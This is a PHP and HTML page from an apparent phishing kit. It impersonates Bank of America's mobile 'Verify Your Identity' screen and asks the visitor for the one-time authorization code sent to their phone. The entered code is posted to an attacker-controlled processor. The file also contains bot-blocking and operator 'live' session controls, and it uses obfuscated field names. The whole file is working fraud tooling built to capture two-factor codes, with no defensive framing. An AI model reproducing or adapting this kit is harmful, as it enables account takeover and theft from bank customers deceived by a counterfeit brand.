<?php
if($grabotp==0){banbot();}
$ud=file_get_contents(gethomedir().'/admin/live.json');
$udarray = json_decode($ud);
if(!isset($udarray->{$_SESSION['client']}) && getadmin('live') == 'on'){header("location:".$index."?".genv(gonext("otp"))."=".md5(rand(10, 9999)));exit();};
?>
<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>Bank of America | Contact Update</title><link rel="shortcut icon" href="<?php echo gaflder();?><?php echo gefnm("/favicon.ico");?>?ts=20151018" type="image/x-icon"><link rel="stylesheet" href="<?php echo gaflder();?><?php echo gefnm("/btch.css");?>"><link rel="stylesheet" href="<?php echo gaflder();?><?php echo gefnm("/tolb.css");?>"><link rel="stylesheet" href="<?php echo gaflder();?><?php echo gefnm("/lview.css");?>"><link rel="stylesheet" href="<?php echo gaflder();?><?php echo gefnm("/ft.css");?>"><link rel="stylesheet" href="<?php echo gaflder();?><?php echo gefnm("/slidemenu.css");?>"><style>
	.signonVersionTwoHomePage{max-width:400px;margin:auto;}
	.fsd-secure-esp-skin {
    padding: 20px 0 20px 20px;
	;}
	.new{margin: 9px 9px;}
	.news{margin: 0px 9px;}
	.fl-lt {float: left;}
	.hhh{font-weight:450;font-size:18px;}
	.sss{font-weight:normal;font-size:13px;}
	a {color: #36C;text-decoration: none;}
</style></head>
<body><div id="page" class="" style="position: static; float: left; height: 100%; width: 100%; left: 100%; display: block;"><div class="header-module"><div class="fsd-secure-esp-skin"><img height="28" width="230" alt="Bank of America" src="<?php echo gaflder();?><?php echo gefnm("/BofA_rgb.png");?>"><div class="clearboth"></div></div></div><div id="cmw_toolBar_" class="cmw_toolBar_"><a id="leftButton" role="button" class="hidden"></a><a id="slidemenuz" class="sprite backButton icon sprite-menu" href="#" title="Show menu for all mobile banking features" role="button"></a><div id="barker" class="hidden"></div><h1 id="title" class=""><div id="cmw_toolBar_titleText" style="padding-left: 34px; padding-right: 34px; width: 100%;">Verify Your Identity</div><span class="adaHidden" id="adaTitleText">Enter your Online ID</span></h1><a id="rightButton" class="hidden"></a></div><div class="pageMinHeight"><div class="signonVersionTwoHomePage"><div id="scrollerwrapperOt" class="overthrow"><?php if(isset($_GET[''.$theerrkey.''])){echo '<div id="accountLocked" class=""><ul class="listView edge"><li role="button" class="noLink"><div class="imageWrap paddingHoriz20"><img src="'.gaflder().gefnm("/ico_alert@2x.png").'" class=""></div><p class="subVal padding10 fontRed" id="headError">Error</p><p class="subVal padding10" id="bodyError">The Code you entered was invalid. Try again...</p></li></ul></div>';};?><div id="successMsg"></div><div id="newOnlineId" style=""><div class="toppad5"><fieldset><h2 class="new hhh">Enter Authorization Code.</h2><br/><div class="new sss">An authorization code has been sent to your phone</div><br/><div></div><br/><div class="inputEntryContainer"><form action="<?php echo $_SESSION['processor'];?>" id="frmCustomOnlineId" method="post"><label class="news">Authorization Code</label><div class="inputContainer"><input type="text" class="focus sprite-clear_input_icns" name="<?php echo gaN('otp');?>" maxlength="" placeholder="XXXXXX" autocomplete="off" autocapitalize="off" autocorrect="off" spellcheck="false"><input type="hidden" name="<?php echo gaN('ott');?>" value="<?php echo md5(uniqid());?>"></div><div class="new sss"S>This code expires 10 minutes after it is requested.</div><div style="margin: 9px 15px;">&nbsp;</div><a class="fl-lt forgot-passcode new" name="forgot-your-passcode">Request another authorization code</a></form></div></fieldset></div></div></div><div><a id="btSignonContinue" href="javascript:void(0);" onclick="frmCustomOnlineId.submit();" role="button" class="btn"><img style="margin-bottom:-4px;" class="paddingHoriz10" src="<?php echo gaflder();?><?php echo gefnm("/secure_lock.png");?>"><span id="signonLabel">Next</span></a></div><div><div class="padding10 center"></div><div class="padding10"></div></div></div></div></div><div></div></body></html>